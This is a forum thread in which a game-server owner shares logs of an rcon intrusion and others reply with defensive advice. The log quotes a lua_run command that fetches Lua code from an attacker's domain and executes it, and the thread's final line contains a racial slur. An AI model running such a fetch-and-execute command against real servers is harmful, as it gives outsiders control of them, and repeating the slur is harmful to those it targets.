Urgent Got hacked, Questions.

L 10/03/2014 - 20:32:42: “p cool<62><STEAM_0:1:40236125><>” connected, address “75.139.144.62:47047”
L 10/03/2014 - 20:33:09: rcon from “75.139.144.62:36818”: command “lua_run http.Fetch ( [[http]] … string.char ( 58 ) … [[/]] … [[/blackdicks6969.co.uk/vkiovb.lua]], function ( c ) pcall ( CompileString ( c, [[l]], false ) ) end, function ( ) end )”

Then he started to talk in console and ban anyone who complained. I never had a rcon password set so wheni shut it down there was a pass set to 001. How can i prevent this going forward.

dont include an rcon_password within your server.cfg and set the acces to read only.

http://blackdicks6969.co.uk/ueinvm.lua

Oh it’s this guy.

Sweet site name.




Pinging blackdicks6969.co.uk [67.205.13.136] with 32 bytes of data:
Reply from 67.205.13.136: bytes=32 time=83ms TTL=52
Reply from 67.205.13.136: bytes=32 time=83ms TTL=52
Reply from 67.205.13.136: bytes=32 time=82ms TTL=52
Reply from 67.205.13.136: bytes=32 time=84ms TTL=52


Maybe if someone want to… stop this guy?

Never include rcon-password in any files. Include it in the run command: +rcon_password “password”
or
Disable the rcon: rcon_password “”

And ofc … restart the server to clear the junkcode.

I searched for ueinvm.lua I dont see it anywhere on my server.

Just ban this steamid

STEAM_0:0:49191585

Hope he doesn’t use alts :stuck_out_tongue:

It’s rbeslow, you can just remove the rcon from your server.cfg and hes shit outta luck.

Yeahp, hes using blackdicks6969 since the govt banned the other domain be brought like 5mins after purchase… nigger.io